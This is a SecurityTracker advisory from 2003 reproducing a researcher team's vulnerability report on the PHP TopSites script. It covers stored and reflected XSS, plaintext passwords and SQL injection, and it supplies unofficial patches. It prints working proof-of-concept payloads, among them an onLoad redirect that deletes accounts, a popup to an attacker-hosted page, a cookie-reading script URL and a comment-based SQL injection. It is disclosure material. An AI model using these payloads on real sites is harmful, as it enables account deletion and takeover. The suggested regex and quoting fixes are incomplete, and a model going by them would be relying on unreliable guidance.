SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHP TopSites Vendors:   iTop10.Net
PHP TopSites Input Validation Flaws Let Remote Users Access the Database and Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1005921
SecurityTracker URL:  http://securitytracker.com/id/1005921
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 15 2003
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.0 beta and prior versions
Description:   The CyberArmy Application and Code Auditing Team reported several input validation vulnerabilities in PHP TopSites. A remote user can execute SQL commands on the underlying database. A remote user can also conduct cross-site scripting attacks against site users and administrators.

It is reported that the 'add.php' script does not properly filter user-supplied HTML. A remote user can invoke this script to add a site and include specially crafted HTML-based scripting code in the description field. Then, when an administrator views the page containing the description, the code will be executed by the administrator's browser. The code will be able to take actions on the site acting as the target administrator, such as deleting or modifying user accounts.

A demonstration exploit (as content for the description field) that causes the account with the specified 'sid' to be deleted is provided:

<body onLoad "parent.location='http://[target]/TopSitesdirectory/seditor.php?sid=siteidnumber&a=delete'">

It is also reported that the 'help.php' script does not filter user-supplied HTML. A remote user can invoke this script with a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running PHP TopSites and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies belonging to other applications), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/TopSitesdirectory/help.php?sid=<script>alert(document.cookie)</script>

It is also reported that remote authenticated users with access to the admin panel or edit.php page can view user passwords.

It is also reported that in certain versions (1.x), a remote user can inject SQL statements to be executed on the underlying MySQL database. This is due to the lack of quoting of numeric data in the SQL statement and the 'register_globals' configuration in 'php.ini', according to the report. A remote user can view user account details, edit site details, and view passwords.

A demonstration exploit URL is provided:

http://[target]/topsitesdirectory/edit.php?a=pre&submit=&sid=siteidnumber

The vendor has reportedly been notified.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running PHP TopSites, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute commands on the underlying MySQL database (for version 1.x of PHP TopSites) to view user account data, edit TopSite entries, and view passwords.

Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided an unofficial fix for at least some of the flaws. The fix is described in the Source Message.

Vendor URL:  www.itop10.net/products/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Vulnerability Report



CASR - ACAT=20
PHP TopSites Vulnerability Report
01/13/03


The purpose of this document is to show several vulnerabilities and =
provide fixes for the PHP TopSites Pro/Free script.  This report is =
published for educational purposes only. The authors take no =
responsibility for damage resulting from the misuse of this information. =
All copyrights are retained by the authors. This information may not be =
reproduced without prior written consent from the authors.

PHP TopSites is a PHP/MySQL-based customizable TopList script. Main =
features include: Easy configuration config file; MySQL database =
backend; unlimited categories, Site rating on incoming votes; Special =
Rating from Webmaster; anti-cheating gateway; Random link; Lost password =
function; Webmaster Site-approval; Edit site; ProcessingTime display; =
Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection =
and much more.
http://www.itop10.net/products/

The ACAT Team estimates that there are over 3000 websites that utilize =
PHP TopSites scripts and that 95% of those websites are vulnerable to at =
least one of the following vulnerabilities.  Even after several attempt =
by the ACAT Team to contact the developer, the company still refuses to =
acknowledge any of these vulnerabilities. =20


Vulnerability 1.

Critical XSS Vulnerability in all versions of PHP TopSites

Version: All
Script: Add.php

Because PHP TopSites does not have session authentication, it allows an =
attacker to use an XSS vulnerability to do things like delete, edit, and =
change user accounts by having an unknowing admin run the code. By =
putting the following in the description field when adding a new website =
to any particular topsite, it's almost impossible for any admin not to =
run the following code (unless they have customized browser security =
settings).  The following code is executed when the admin loads the =
page.  He has to do nothing but load the page in order to validate a =
site and the integrity of the database can be destroyed as the code is =
never parsed out of the field and the page does not display it, it =
executes it.  Below are a few examples - placed into the description =
field when adding a new site.

<body onLoad=3D =
"parent.location=3D'http://www.somewebsite.com/TopSitesdirectory/seditor.=
php?sid=3Dsiteidnumber&a=3Ddelete'">
This code will effectively delete the user account with the site id =
number as soon as the admin loads the page.

<body onLoad=3D"window.open('http://attackerswebsite/launcher.htm')">
Using this code, an attacker can open a popup window to a page on his =
site that contains code for several more popup windows.  Each window can =
be used to delete a site from the PHP TopSites database.  This method =
can totally erase a TopSites database as soon as the admin loads the =
page.

To fix this vulnerability open add.php and find:

if (!$name) { $err.=3D "Please enter your name.<BR>"; }
if (!$passw) { $err.=3D "Please enter password.<BR>"; }
if (!$email) { $err.=3D "Please enter your email address.<BR>"; }
if (!$title) { $err.=3D "Please enter site title.<BR>"; }
if (!$url) { $err.=3D "Please enter site url.<BR>"; }
if (!$banner_w) { $err.=3D "Please enter banner width.<BR>"; }
if (!$banner_h) { $err.=3D "Please enter banner height.<BR>"; }
if (!$description) { $err.=3D "Please enter site description.<BR>"; }
if (!$category) { $err.=3D "Please enter site category.<BR>"; }
if (check_email_addr($email) =3D=3D 0) { $err.=3D "Please enter valid =
email
address.<BR>"; }

Below it paste:

/////////////////////////////////////////////////////////////////////////=
///
////////////////////////
// Critical XSS Vuln Fix By JeiAr =3D (jeiar@kmfms.com) January 12 2003 =
- All
versions PHP Topsites //
/////////////////////////////////////////////////////////////////////////=
///
////////////////////////
if (ereg('[-!#$%&\'*+\\.><=3D?^_`{|}]$', $name)) {$err.=3D "Please enter =
A valid
Name.<BR>";}
if (ereg('[-!#$%&\'*+\\.><=3D?^_`{|}]$', $passw)) {$err.=3D "Please =
enter A
valid Password<BR>";}
if (ereg('[-!#$%&\'*+\\.><=3D?^_`{|}]$', $title)) {$err.=3D "Please =
enter A
valid Title<BR>";}
if (ereg('[-!#$%&\'*+\\.><=3D?^_`{|}]$', $linkback)) {$err.=3D "Please =
enter A
valid Linkback<BR>";}
if (ereg('[-!#$%&\'*+\\.><=3D?^_`{|}]$', $url)) {$err.=3D "Please enter =
A valid
URL<BR>";}
if (ereg('[-!#$%&\'*+\\.><=3D?^_`{|}]$', $banner_url)) {$err.=3D "Please =
enter A
valid Banner URL<BR>";}
if (ereg('[-!#$%&\'*+\\.><=3D?^_`{|}]$', $banner_w)) {$err.=3D "Please =
enter A
valid Banner Width<BR>";}
if (ereg('[-!#$%&\'*+\\.><=3D?^_`{|}]$', $banner_h)) {$err.=3D "Please =
enter A
valid Banner Height<BR>";}
if (ereg('[-!#$%&\'*+\\.><=3D?^_`{|}]$', $description)) {$err.=3D =
"Please enter
A valid Description<BR>";}
if (ereg('[-!#$%&\'*+\\.><=3D?^_`{|}]$', $category)) {$err.=3D "Please =
enter A
valid Category<BR>";}
/////////////////////////////////////////////////////////////////////////=
///
////////////////////////



Vulnerability 2.

Critical XSS Vulnerability in all versions of PHP TopSites

Version: All
Script: help.php

Because PHP TopSites does not have session authentication, it allows an =
attacker to use an XSS vulnerability steal cookies or other =
user-supplied information.  The page being generated with unvalidated =
input from untrustworthy sources causes this vulnerability. The =
developer is urged to implement session authentication into this script. =
 The following example lies in the help.php file.

http://somewebsitesite/TopSitesdirectory/help.php?sid=3D<script>alert(doc=
ument.cookie)</script>


Vulnerability 3.

Plaintext Password Disclosure Vulnerability in all versions of PHP =
TopSites

Version: All
Script: edit.php and admin scripts

No current versions of PHP TopSites encrypt user passwords, and these =
plaintext passwords can be viewed by anyone with access to the admin =
panel or edit.php page. Any Topsite Admin (or intruder) can possibly use =
the user supplied password to try and compromise the security of the =
user supplied website and or the user supplied email account. So anyone =
signing up for a TopList using PHP TopSites should keep this in mind, =
and it should also be noted to anyone using the same password for =
everything, that this is generally not a very good habit to have. This =
vulnerability affects all versions. A suggestion to the developer would =
be to crypt the passes via the md5 function, and not allow the password =
to be displayed to an admin when editing a TopList user(s).


Vulnerability 4.

PHP TopSites User Account Compromise Vulnerability in All Pro versions =
and in 1.xx Free versions

Version: All Pro Versions and Free Versions 1.xx
Script:edit.php

This is exploitable because of two conditions in the PHP/MYSQL =
configuration. Firstly, register_globals parameter is on in php.ini, =
which automatically turns every variable into a global variable. =
Secondly, the underlying database is MYSQL, which does not require =
numeric criteria in the SQL statement to be quoted. This allows an =
attacker to bypass the magic_quoted_gpcs protection in PHP manipulating =
numeric parts of a query.

It is possible for an attacker to use SQL injection to expose all user =
account details for any user he or she knows the id number of. All site =
ID numbers of a particular Top List are made available on the index.php =
page. The vulnerable code resides in edit.php.  Examples are listed =
below.

http://examplewebsite.com/topsitesdirectory/edit.php?a=3Dpre&submit=3D&si=
d=3Dsiteidnumber--
This injection negates the use of a password and provides access to the =
TopList edit page.  All information about a particular site can be =
viewed and edited from this page.  One thing to note, the password is =
displayed as plaintext on this page also.

All users of the 1.XX Free script(s) are urged to upgrade their scripts =
as soon as possible. If you are not able to upgrade, the below code =
should serve as a quick fix.=20

In the Edit.php file change:
$query =3D mysql_db_query ($dbname,"Select * from top_user Where =
sid=3D$sid AND password=3D'$passw'",$db) or die (mysql_error()); =
$num_rows =3D mysql_num_rows($query);
to:
$query =3D mysql_db_query ($dbname,"Select * from top_user Where =
sid=3D'$sid'
AND password=3D'$passw'",$db) or die (mysql_error()); $num_rows =3D =
mysql_num_rows($query);


In conclusion, the vulnerabilities in this script make it very easy for =
an attacker to exploit.  The vulnerabilities present in this script =
compromise the security of user accounts, the integrity of the data in =
the database, and the security of the server it is hosted on.  All =
administrators that are currently using this script in their websites =
are strongly urged to patch or upgrade the PHP TopSites script.  Some =
versions, such as the Pro version, have no developer upgrades or patches =
available at the time of this writing, so they are still vulnerable to =
the attacks mentioned above.

All Credits go to the CyberArmy Application and Code Auditing Team:

JeiAr
Paragod
Virtex
Ravpup
Praxxis
Mortal
Genome



=09

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC